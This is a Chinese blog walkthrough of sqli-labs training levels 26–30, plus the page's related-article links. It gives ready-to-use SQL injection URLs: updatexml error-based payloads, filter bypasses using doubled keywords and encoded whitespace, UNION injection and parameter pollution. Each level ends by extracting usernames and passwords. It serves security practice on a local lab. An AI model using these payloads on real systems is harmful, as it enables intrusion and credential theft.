sqli-labs靶场通关攻略 26-30

最新推荐文章于 2024-11-03 22:34:49 发布
最新推荐文章于 2024-11-03 22:34:49 发布
阅读量1k 收藏 10
点赞数 31
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82061181/article/details/141466310
版权

主页有sqli-labs靶场通关攻略 1-25

第二六关 less-26

步骤一:输入?id=1 发现逻辑运算符,注释符以及空格给过滤了

步骤二:?id=1 and'闭合,转换:逻辑运算符使用双写或者&&和||替换,空格用括号替换

步骤三:查询数据库名

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(database()))),1))||%27

步骤四:查看表名

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27

步骤五:查看users表中的列名

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27

步骤六:查看信息

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27

第二七关 less-27

步骤一:过滤了空格,select和union大小写绕过,%09代替空格

查数据库

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27

步骤二:查看表名

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27

步骤三:查看users表中列名

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27

步骤四:查看users表中信息

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27

第二八关 less-28

过滤了空格,union和select,空格用%0A替换,union select双写替换

步骤一:查询数据库

http://127.0.0.1/less-28/?id=0%27)%20%0aunionunion%20%0a%20select%0aselect%20%0a%201,2,database();%00

步骤二:查询表名

http://127.0.0.1/less-28/?id=99%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema=%27security%27and%20(%271

步骤三:查看users表中列名

http://127.0.0.1/less-28/?id=99%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

第二九关 less-29

步骤一:查看数据库名

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+

步骤二:查看表名

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

步骤三:查看users表中列名

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

步骤四:查看信息

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

第三十关 less-30

29关和30关闭合方式不同

步骤一:查看数据库名

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+

 步骤二:查看表名

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

 步骤三:查看users表中列名

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

 步骤四:查看信息

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

云舒zovn
关注
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs less-26 空格绕过
wanggonghanfei的博客
10-13 934
sqli-labs less-26 空格绕过
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
php 环境,sqlmap 注入测试项目:Sqli-labs-maste 一步到位
数据库原理上机实验4(数据更新实验){insert;update;delete;is null的使用}
最新发布
2301_80330510的博客
11-03 353
1、insertinto 插入数据 2、update 更新数据 3、delete 删除数据 4、is null 判断为空;is not null 判断不为空
cookie、session、http简单理解
m0_68791463的博客
11-02 227
cookie通过用户密码登陆后,生成一个session 保存在浏览器中,返回sessionid方便会话进行。而sessionid就对应数据库数据这个id,服务器找到对应id的Session实现连接的状态保持。token通过用户密码登陆后,生成token在接口中返回值,在下一次请求中携带。Cookie:以key-value键值对的形式存储一些文本信息数据。数据库中有一个seesion表,存放着所有的Session数据,服务器端验证传递的token和算法生成的token是否一致。是一个令牌,用于用户验证的。
Oracle APEX开发小技巧10】CSS样式控制交互式报表列宽和自动换行效果
clover_oreo的博客
11-01 258
在实际开发中使用交互式报表可能会出现某些字段的列宽过长,某些字段的列宽只有缩到一角的情况,那么如何解决这种情况呢?有没有方法可以控制交互式报表的列宽呢?长度固定,不再是被挤到一角。页设置-页-CSS-内嵌。
openGauss数据库-头歌实验1-5 修改数据库
2302_76949164的博客
11-02 894
大三数据库头歌实验,涉及openGauss,记录一下供随时查阅
存储过程及部分练习笔记
qq_42217078的博客
10-30 988
select Roomid 班级,round(avg(degree),2) 班级平均成绩 into gebanjunfen from student。select if((degree+0) > 85,"考得好","考得不好") 考试状态 into jieguo from student。select Roomid 班级, round(avg(degree),2) 班级平均成绩 from student。-- 3:创建一个存储过程,根据所给的班级的编号,统计该班人数,并将人数以输出变量返回给用户。
刘艳兵-DBA015-对于属于默认undo撤销表空间的数据文件的丢失,哪条语句是正确的?
刘艳兵的学习博客
10-30 353
对于属于默认undo撤销表空间的数据文件的丢失,哪条语句是正确的?
MySQL数据库备份与恢复
tatasix的博客
10-30 868
MySQL数据库备份与恢复是保障数据安全和系统稳定运行的重要措施。本文介绍了MySQL备份的常用方式,包括逻辑备份和物理备份。逻辑备份通过mysqldump生成SQL文件,适合小规模数据库,便于跨版本恢复;物理备份直接复制数据库文件,速度快,适合大数据量备份。对于恢复操作,mysqldump文件恢复适合逻辑备份,物理备份文件恢复适合同一环境的冷备份。文章还提供了备份与恢复的最佳实践,如增量备份与完全备份结合、备份文件压缩加密等,并附有自动化备份脚本示例,帮助用户更高效地保障数据库的可靠性。
mysql事务
2201_76081438的博客
10-30 757
事务是一个不可分割的最小工作单元事务只和数据库的增删改有,一个完整的事务需要批量的增删改语句。
sql注入——靶场Less1
2301_80144612的博客
11-03 345
查询security表中有哪些表。查询users表中有哪些信息。展示所有users表中的信息。查询当前使用的数据库的名称。
openGauss数据库-头歌实验1-4 数据库及表的创建
2302_76949164的博客
11-02 797
大三数据库头歌实验,涉及openGauss,记录一下供随时查阅
软考:数据库考点总结
LeonNo11的博客
11-03 365
数据库管理系统(DBMS)通过锁机制、事务隔离级别、死锁检测等手段来识别和处理这些冲突,以确保数据的一致性和系统的高效运行。在数据库领域,冲突主要指的是在并发操作中,多个事务试图同时访问或修改相同的数据资源,导致数据一致性、完整性和隔离性受到威胁。数据持久层:数据的存储形式,比如内存,硬盘,内存和硬盘接口,定制可插拔四种形式。数据分布层,数据如何进行分布的,类似系是数据库,CAP支持,数据中心支持,动态部署支持。3、灵活的数据模型,无需事前为要存储的数据建立字段,随时可用存储自定义的数据格式。
Oracle】空格单字符通配符查询匹配失败
懂得一千零一种,赋予你失败的方法!
11-01 438
空格单字符通配符查询匹配失败
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值